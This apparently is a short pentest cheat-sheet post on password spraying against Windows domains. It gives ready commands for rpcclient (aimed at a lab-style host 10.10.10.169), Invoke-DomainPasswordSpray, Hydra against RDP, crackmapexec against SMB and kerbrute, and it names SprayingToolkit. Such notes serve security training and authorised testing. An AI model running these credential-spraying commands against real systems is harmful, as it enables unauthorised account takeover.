Password spraying: Try a few passwords against a large set of users.
Manual
for u in Administrator Guest krbtgt DefaultAccount ryan marko sunita abigail marcus sally fred angela felicia gustavo ulf stevie claire paulo steve annette annika per claude melanie zach simon naoki; do rpcclient -W MEGABANK -U $u 10.10.10.169; done;
With PowerShell
Download DomainPasswordSpray and upload it to the target. Then execute
PS> Invoke-DomainPasswordSpray -Password Test123
With Hydra
hydra -L /usr/share/wordlists/dirb/others/names.txt -p "RetrievedSuperSecurePassword" rdp://$target
With crackmapexec (against SMB shares)
- Create a list of users, e.g. users.txt:
tom
jerry - Execute crackmapexec with one password:
crackmapexec smb $target -u users.txt -p 'Password123' --continue-on-success [-d ad.dom]
With kerbute
On Linux:
python kerbrute.py …
On Windows, download it on Github.
- Create a list of users, e.g. users.txt:
tom
jerry - Execute kerbrute with one password:
kerbrute_windows_amd64.exe passwordspray -d dom.ain users.txt "Pass123"
Tools
- SprayingToolkit (Microsoft Office 365, OWA, Lync/S4B)
Leave a Reply
You must be logged in to post a comment.